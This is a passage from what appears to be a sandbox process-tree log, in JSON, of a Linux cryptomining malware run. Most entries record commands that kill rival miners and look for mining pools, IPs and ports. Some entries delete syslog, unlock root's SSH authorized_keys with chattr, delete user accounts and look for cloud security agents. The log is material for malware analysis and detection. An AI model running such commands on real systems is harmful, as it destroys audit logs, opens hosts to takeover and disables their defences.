21360, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21768, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21441, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21870, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21351, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21252, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21263, "command_line_args": "grep /tmp/pprt" }, { "process_name": "/usr/bin/xargs", "pid": 21665, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21341, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21922, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21488, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21599, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21481, "command_line_args": "awk length($11)>19{print $2}" }, { "process_name": "/usr/bin/pgrep", "pid": 22001, "command_line_args": "pgrep -f OIcJi1m" }, { "process_name": "/bin/ps", "pid": 21533, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21301, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21732, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21559, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21837, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21583, "command_line_args": "grep cpuset" }, { "process_name": "/bin/ps", "pid": 21366, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21730, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21316, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21449, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21761, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21415, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21334, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21285, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21509, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21703, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21972, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21744, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21966, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21947, "command_line_args": "pgrep -f ./A7mA5gb" }, { "process_name": "/usr/bin/xargs", "pid": 21904, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21772, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/cut", "pid": 21579, "command_line_args": "cut -c 9-15" }, { "process_name": "/usr/bin/pgrep", "pid": 21965, "command_line_args": "pgrep -f jawa" }, { "process_name": "/bin/grep", "pid": 21303, "command_line_args": "grep 51.15.56.161" }, { "process_name": "/bin/ps", "pid": 21513, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21430, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21265, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21704, "command_line_args": "grep logo9.jpg" }, { "process_name": "/bin/grep", "pid": 21784, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21898, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21292, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21716, "command_line_args": "grep wget" }, { "process_name": "/bin/ps", "pid": 21719, "command_line_args": "ps aux" }, { "process_name": "/bin/ps", "pid": 21503, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21274, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21388, "command_line_args": "grep HiPxCJRS" }, { "process_name": "/bin/ps", "pid": 21581, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21860, "command_line_args": "grep xmrpool.eu" }, { "process_name": "/bin/grep", "pid": 21820, "command_line_args": "grep xmr.crypto-pool.fr:3333" }, { "process_name": "/bin/ps", "pid": 21306, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21728, "command_line_args": "grep wget" }, { "process_name": "/usr/bin/xargs", "pid": 21385, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21663, "command_line_args": "grep wget" }, { "process_name": "/usr/bin/awk", "pid": 21526, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21714, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/pgrep", "pid": 21937, "command_line_args": "pgrep -f ./pces" }, { "process_name": "/usr/bin/xargs", "pid": 21968, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21954, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21994, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21801, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21288, "command_line_args": "grep IOFoqIgyC0zmf2UR" }, { "process_name": "/bin/ps", "pid": 21650, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21900, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21939, "command_line_args": "pgrep -f ./rspce" }, { "process_name": "/bin/ps", "pid": 21592, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21667, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/pgrep", "pid": 21951, "command_line_args": "pgrep -f kswap_svc" }, { "process_name": "/usr/bin/xargs", "pid": 21950, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21975, "command_line_args": "pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRj" }, { "process_name": "/usr/bin/xargs", "pid": 21280, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21532, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21499, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21267, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21273, "command_line_args": "grep /tmp/65ccE*" }, { "process_name": "/bin/grep", "pid": 21530, "command_line_args": "grep 89.35.39.78" }, { "process_name": "/usr/bin/pgrep", "pid": 21993, "command_line_args": "pgrep -f 2Ne80nA" }, { "process_name": "/usr/bin/xargs", "pid": 21454, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21548, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21754, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/pgrep", "pid": 21999, "command_line_args": "pgrep -f watchbog" }, { "process_name": "/usr/bin/xargs", "pid": 21827, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21339, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21916, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21428, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21804, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21940, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21516, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21644, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21638, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21614, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21596, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21721, "command_line_args": "grep luk-cpu" }, { "process_name": "/usr/bin/xargs", "pid": 21305, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21262, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21519, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21836, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21345, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21739, "command_line_args": "grep he.sh" }, { "process_name": "/bin/ps", "pid": 21737, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21254, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21742, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21980, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21863, "command_line_args": "ps auxf" }, { "process_name": "/bin/ps", "pid": 21813, "command_line_args": "ps auxf" }, { "process_name": "/usr/bin/xargs", "pid": 21974, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21255, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21810, "command_line_args": "grep pool.t00ls.ru" }, { "process_name": "/bin/grep", "pid": 21566, "command_line_args": "grep -v atd" }, { "process_name": "/bin/grep", "pid": 21763, "command_line_args": "grep nullcrew" }, { "process_name": "/bin/grep", "pid": 21582, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21429, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21830, "command_line_args": "grep monerohash.com" }, { "process_name": "/bin/grep", "pid": 21348, "command_line_args": "grep BtwXn5qH" }, { "process_name": "/usr/bin/xargs", "pid": 21802, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21876, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/grep", "pid": 21540, "command_line_args": "grep kthrotlds" }, { "process_name": "/bin/grep", "pid": 21774, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21382, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21352, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21464, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21086, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/bin/grep", "pid": 21248, "command_line_args": "grep darwin" }, { "process_name": "/bin/grep", "pid": 21167, "command_line_args": "grep :7777" }, { "process_name": "/usr/bin/xargs", "pid": 21146, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/sbin/userdel", "pid": 21066, "command_line_args": "userdel vfinder" }, { "process_name": "/bin/grep", "pid": 21138, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/xargs", "pid": 21112, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21098, "command_line_args": "grep -v -" }, { "process_name": "/bin/grep", "pid": 21151, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/awk", "pid": 21209, "command_line_args": "awk {if($3>80.0) print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21093, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21179, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21172, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21144, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/bin/grep", "pid": 21184, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/awk", "pid": 21169, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/grep", "pid": 21134, "command_line_args": "grep :4444" }, { "process_name": "/bin/ps", "pid": 21072, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21250, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21102, "command_line_args": "awk {print $7}" }, { "process_name": "/usr/bin/xargs", "pid": 21199, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21171, "command_line_args": "grep -v -" }, { "process_name": "/bin/grep", "pid": 21118, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/awk", "pid": 21079, "command_line_args": "awk {print $7}" }, { "process_name": "/usr/bin/awk", "pid": 21203, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/usr/bin/awk", "pid": 21197, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/bin/grep", "pid": 21232, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21124, "command_line_args": "grep -v -" }, { "process_name": "/bin/grep", "pid": 21077, "command_line_args": "grep 185.71.65.238" }, { "process_name": "/bin/rm", "pid": 21070, "command_line_args": "rm -rf /tmp/walle*" }, { "process_name": "/usr/bin/xargs", "pid": 21230, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21241, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21149, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/grep", "pid": 21141, "command_line_args": "grep :5555" }, { "process_name": "/bin/grep", "pid": 21187, "command_line_args": "grep :14444" }, { "process_name": "/usr/bin/awk", "pid": 21224, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21122, "command_line_args": "awk {print $7}" }, { "process_name": "/usr/bin/awk", "pid": 21188, "command_line_args": "awk {print $7}" }, { "process_name": "/usr/bin/awk", "pid": 21202, "command_line_args": "awk {print $7}" }, { "process_name": "/usr/bin/xargs", "pid": 21125, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21163, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/bin/grep", "pid": 21178, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/awk", "pid": 21104, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/usr/bin/awk", "pid": 21156, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/usr/bin/awk", "pid": 21170, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/usr/bin/xargs", "pid": 21210, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21109, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/grep", "pid": 21145, "command_line_args": "grep -v -" }, { "process_name": "/bin/grep", "pid": 21164, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/xargs", "pid": 21205, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21155, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/grep", "pid": 21095, "command_line_args": "grep :23" }, { "process_name": "/usr/bin/xargs", "pid": 21192, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21123, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/usr/bin/awk", "pid": 21244, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21111, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/xargs", "pid": 21235, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/rm", "pid": 21062, "command_line_args": "rm -rf /var/log/syslog" }, { "process_name": "/bin/grep", "pid": 21208, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21233, "command_line_args": "grep systemten" }, { "process_name": "/bin/grep", "pid": 21121, "command_line_args": "grep :3333" }, { "process_name": "/usr/sbin/userdel", "pid": 21065, "command_line_args": "userdel akay" }, { "process_name": "/bin/rm", "pid": 21069, "command_line_args": "rm -rf /tmp/addres*" }, { "process_name": "/usr/bin/awk", "pid": 21084, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/grep", "pid": 21105, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/awk", "pid": 21219, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21218, "command_line_args": "grep :5555" }, { "process_name": "/usr/bin/xargs", "pid": 21185, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21137, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/bin/grep", "pid": 21157, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/awk", "pid": 21234, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/grep", "pid": 21101, "command_line_args": "grep :443" }, { "process_name": "/usr/bin/awk", "pid": 21214, "command_line_args": "awk {print $2}" }, { "process_name": "/bin/ps", "pid": 21211, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21190, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/bin/ps", "pid": 21246, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21207, "command_line_args": "grep -vw kdevtmpfsi" }, { "process_name": "/usr/bin/awk", "pid": 21115, "command_line_args": "awk {print $7}" }, { "process_name": "/usr/bin/xargs", "pid": 21087, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21129, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/bin/grep", "pid": 21127, "command_line_args": "grep :3389" }, { "process_name": "/usr/bin/awk", "pid": 21175, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/ps", "pid": 21216, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21243, "command_line_args": "grep voltuned" }, { "process_name": "/bin/grep", "pid": 21217, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21089, "command_line_args": "grep :443" }, { "process_name": "/usr/bin/xargs", "pid": 21215, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21195, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/grep", "pid": 21131, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/chattr", "pid": 21067, "command_line_args": "chattr -iae /root/.ssh/" }, { "process_name": "/usr/bin/chattr", "pid": 21063, "command_line_args": "chattr -iua /tmp/" }, { "process_name": "/usr/bin/awk", "pid": 21135, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/ps", "pid": 21226, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21240, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21223, "command_line_args": "grep kworker -c\\" }, { "process_name": "/bin/grep", "pid": 21191, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/xargs", "pid": 21106, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21247, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21081, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21150, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/usr/bin/awk", "pid": 21117, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/usr/bin/xargs", "pid": 21119, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/chattr", "pid": 21068, "command_line_args": "chattr -iae /root/.ssh/authorized_keys" }, { "process_name": "/usr/bin/awk", "pid": 21239, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21096, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/grep", "pid": 21228, "command_line_args": "grep log_" }, { "process_name": "/bin/ps", "pid": 21236, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/xargs", "pid": 21220, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21242, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21108, "command_line_args": "grep :143" }, { "process_name": "/bin/grep", "pid": 21154, "command_line_args": "grep :6665" }, { "process_name": "/bin/ps", "pid": 21206, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21148, "command_line_args": "grep :6666" }, { "process_name": "/bin/grep", "pid": 21092, "command_line_args": "grep -v -" }, { "process_name": "/bin/grep", "pid": 21201, "command_line_args": "grep :13531" }, { "process_name": "/bin/grep", "pid": 21222, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/chattr", "pid": 21064, "command_line_args": "chattr -iua /var/tmp/" }, { "process_name": "/usr/bin/awk", "pid": 21183, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/usr/bin/awk", "pid": 21097, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/bin/grep", "pid": 21181, "command_line_args": "grep :3347" }, { "process_name": "/bin/rm", "pid": 21071, "command_line_args": "rm -rf /tmp/keys" }, { "process_name": "/usr/bin/awk", "pid": 21090, "command_line_args": "awk {print $7}" }, { "process_name": "/usr/bin/awk", "pid": 21249, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/awk", "pid": 21128, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/grep", "pid": 21194, "command_line_args": "grep :14433" }, { "process_name": "/usr/bin/xargs", "pid": 21245, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21162, "command_line_args": "awk {print $7}" }, { "process_name": "/usr/bin/xargs", "pid": 21139, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21204, "command_line_args": "grep -v -" }, { "process_name": "/usr/bin/awk", "pid": 21091, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/bin/ps", "pid": 21221, "command_line_args": "ps aux" }, { "process_name": "/usr/bin/awk", "pid": 21110, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/bin/ps", "pid": 21074, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21238, "command_line_args": "grep netns" }, { "process_name": "/bin/grep", "pid": 21213, "command_line_args": "grep :3333" }, { "process_name": "/bin/grep", "pid": 21237, "command_line_args": "grep -v grep" }, { "process_name": "/bin/grep", "pid": 21114, "command_line_args": "grep :2222" }, { "process_name": "/usr/bin/awk", "pid": 21177, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/usr/bin/awk", "pid": 21080, "command_line_args": "awk -F[/] {print $1}" }, { "process_name": "/bin/grep", "pid": 21174, "command_line_args": "grep :8444" }, { "process_name": "/usr/bin/xargs", "pid": 21165, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21212, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/xargs", "pid": 21132, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21073, "command_line_args": "grep -i [a]liyun" }, { "process_name": "/bin/grep", "pid": 21160, "command_line_args": "grep :6667" }, { "process_name": "/bin/grep", "pid": 21227, "command_line_args": "grep -v grep" }, { "process_name": "/usr/bin/awk", "pid": 21143, "command_line_args": "awk {print $7}" }, { "process_name": "/bin/grep", "pid": 21083, "command_line_args": "grep 140.82.52.87" }, { "process_name": "/usr/bin/xargs", "pid": 21158, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/awk", "pid": 21182, "command_line_args": "awk {print $7}" }, { "process_name": "/usr/bin/awk", "pid": 21229, "command_line_args": "awk {print $2}" }, { "process_name": "/usr/bin/xargs", "pid": 21225, "command_line_args": "xargs -I % kill" }, { "process_name": "/usr/bin/xargs", "pid": 21099, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/grep", "pid": 21075, "command_line_args": "grep -i [y]unjing" }, { "process_name": "/usr/bin/xargs", "pid": 21152, "command_line_args": "xargs -I % kill" }, { "process_name": "/bin/ps", "pid": 21231, "command_line_args": "ps aux" }, { "process_name": "/bin/grep", "pid": 21198, "command_line_args": "grep -v -" } ] }, { "process_name": "/usr/bin/env", "pid": 21054, "command_line_args": "env -i LANG= LANGUAGE=", "child_processes": [ { "process_name": "/bin/run-parts", "pid": 21057, "command_line_args": "run-parts --lsbsysinit --list /lib/lsb/init-functions.d" }, { "process_name": "/usr/sbin/cron", "pid": 21058, "command_line_args": "/usr/sbin/cron" }, { "process_name": "/usr/sbin/cron", "pid": 21058, "command_line_args": "/usr/sbin/cron" }, { "process_name": "/usr/bin/basename", "pid": 21056, "command_line_args": "basename /usr/sbin/service" }, { "process_name": "/usr/bin/basename", "pid": 21055, "command_line_args": "basename /usr/sbin/service" } ] }, { "process_name": "/usr/bin/env", "pid": 21054, "command_line_args": "env -i LANG= LANGUAGE=", "child_processes": [ { "process_name": "/bin/run-parts", "pid": 21057, "command_line_args": "run-parts --lsbsysinit --list /lib/lsb/init-functions.d" }, { "process_name": "/usr/sbin/cron", "pid": 21058, "command_line_args": "/usr/sbin/cron" }, { "process_name": "/usr/sbin/cron", "pid": 21058, "command_line_args": "/usr/sbin/cron" }, { "process_name": "/usr/bin/basename", "pid": 21056, "command_line_args": "basename /usr/sbin/service" }, { "process_name": "/usr/bin/basename", "pid": 21055, "command_line_args": "basename /usr/sbin/service" } ] }, { "process_name": "/usr/bin/env", "pid": 21054, "command_line_args": "env -i LANG= LANGUAGE=", "child_processes": [ { "process_name": "/bin/run-parts", "pid": 21057, "command_line_args": "run-parts --lsbsysinit --list /lib/lsb/init-functions.d" }, { "process_name": "/usr/sbin/cron", "pid": 21058, "command_line_args": "/usr/sbin/cron" }, { "process_name": "/usr/sbin/cron", "pid": 21058, "command_line_args": "/usr/sbin/cron" }, { "process_name": "/usr/bin/basename", "pid": 21056, "command_line_args": "basename /usr/sbin/service" }, { "process_name": "/usr/bin/basename", "pid": 21055, "command_line_args": "basename /usr/sbin/service" } ] }, { "process_name": "/usr/bin/apt-get", "pid": 18584, "command_line_args": "apt-get install -y wget", "child_processes": [ { "process_name": "/usr/bin/dpkg", "pid": 18710, "command_line_args": "/usr/bin/dpkg --status-fd 26 --configure", "child_processes": [ { "process_name": "/var/lib/dpkg/info/cron.postinst", "pid": 20322, "command_line_args": "/var/lib/dpkg/info/cron.postins configure", "child_processes": [ { "process_name": "/usr/bin/perl", "pid": 20343, "command_line_args": "perl /usr/bin/deb-systemd-helper unmask cron.service" }, { "process_name": "/usr/sbin/invoke-rc.d", "pid": 20347, "command_line_args": "invoke-rc.d cron start", "child_processes": [ { "process_name": "/usr/bin/basename", "pid": 20353, "command_line_args": "basename /usr/sbin/invoke-rc.d" }, { "process_name": "/usr/sbin/policy-rc.d", "pid": 20349, "command_line_args": "/usr/sbin/policy-rc.d cron (start)" }, { "process_name": "/usr/bin/basename", "pid": 20348, "command_line_args": "basename /usr/sbin/invoke-rc.d" } ] }, { "process_name": "/bin/chmod", "pid": 20338, "command_line_args": "chmod 1730 /var/spool/cron/crontabs" }, { "process_name": "/usr/bin/dpkg-statoverride", "pid": 20335, "command_line_args": "dpkg-statoverride --list /usr/bin/crontab" }, { "process_name": "/usr/bin/dpkg-maintscript-helper", "pid": 20354, "command_line_args": "dpkg-maintscript-helper rm_conffile /etc/init/cron.conf 3.0pl1-128ubuntu5~", "child_processes": [ { "process_name": "/usr/bin/basename", "pid": 20355, "command_line_args": "basename /usr/bin/dpkg-maintscript-helpe" }, { "process_name": "/usr/bin/dpkg", "pid": 20356, "command_line_args": "dpkg --validate-version -- 3.0pl1-128ubuntu5~" } ] }, { "process_name": "/usr/bin/dpkg-maintscript-helper", "pid": 20326, "command_line_args": "dpkg-maintscript-helper rm_conffile /etc/cron.daily/standard 3.0pl1-124", "child_processes": [ { "process_name": "/usr/bin/dpkg", "pid": 20328, "command_line_args": "dpkg --validate-version -- 3.0pl1-124" }, { "process_name": "/usr/bin/basename", "pid": 20327, "command_line_args": "basename /usr/bin/dpkg-maintscript-helpe" } ] }, { "process_name": "/bin/ls", "pid": 20339, "command_line_args": "ls -1" }, { "process_name": "/usr/bin/perl", "pid": 20343, "command_line_args": "perl /usr/bin/deb-systemd-helper unmask cron.service" }, { "process_name": "/usr/bin/getent", "pid": 20329, "command_line_args": "getent group crontab" }, { "process_name": "/usr/bin/deb-systemd-helper", "pid": 20345, "command_line_args": "deb-systemd-helper enable cron.service" }, { "process_name": "/usr/bin/deb-systemd-helper", "pid": 20345, "command_line_args": "deb-systemd-helper enable cron.service" }, { "process_name": "/usr/bin/xargs", "pid": 20340, "command_line_args": "xargs -r -n 1" }, { "process_name": "/usr/sbin/update-rc.d", "pid": 20346, "command_line_args": "update-rc.d cron start 89" }, { "process_name": "/usr/bin/dpkg-statoverride", "pid": 20336, "command_line_args": "dpkg-statoverride --update --add root" }, { "process_name": "/usr/bin/xargs", "pid": 20342, "command_line_args": "xargs -r -n 1" }, { "process_name": "/usr/bin/perl", "pid": 20344, "command_line_args": "perl /usr/bin/deb-systemd-helper --quiet was-enabled" }, { "process_name": "/bin/ls", "pid": 20341, "command_line_args": "ls -1" }, { "process_name": "/usr/bin/dpkg-maintscript-helper", "pid": 20323, "command_line_args": "dpkg-maintscript-helper rm_conffile /etc/cron.monthly/standard 3.0pl1-113", "child_processes": [ { "process_name": "/usr/bin/basename", "pid": 20324, "command_line_args": "basename /usr/bin/dpkg-maintscript-helpe" }, { "process_name": "/usr/bin/dpkg", "pid": 20325, "command_line_args": "dpkg --validate-version -- 3.0pl1-113" } ] }, { "process_name": "/bin/chown", "pid": 20337, "command_line_args": "chown root:crontab /var/spool/cron/crontabs" }, { "process_name": "/usr/bin/perl", "pid": 20344, "command_line_args": "perl /usr/bin/deb-systemd-helper --quiet was-enabled" }, { "process_name": "/usr/sbin/addgroup", "pid": 20330, "command_line_args": "addgroup --system crontab", "child_processes": [ { "process_name": "/usr/sbin/groupadd", "pid": 20331, "command_line_args": "/usr/sbin/groupadd -g 101 crontab" } ] } ] }, { "process_name": "/var/lib/dpkg/info/ca-certificates.postinst", "pid": 20359, "command_line_args": "/var/lib/dpkg/info/ca-certifica triggered update-ca-certificates", "child_processes": [ { "process_name": 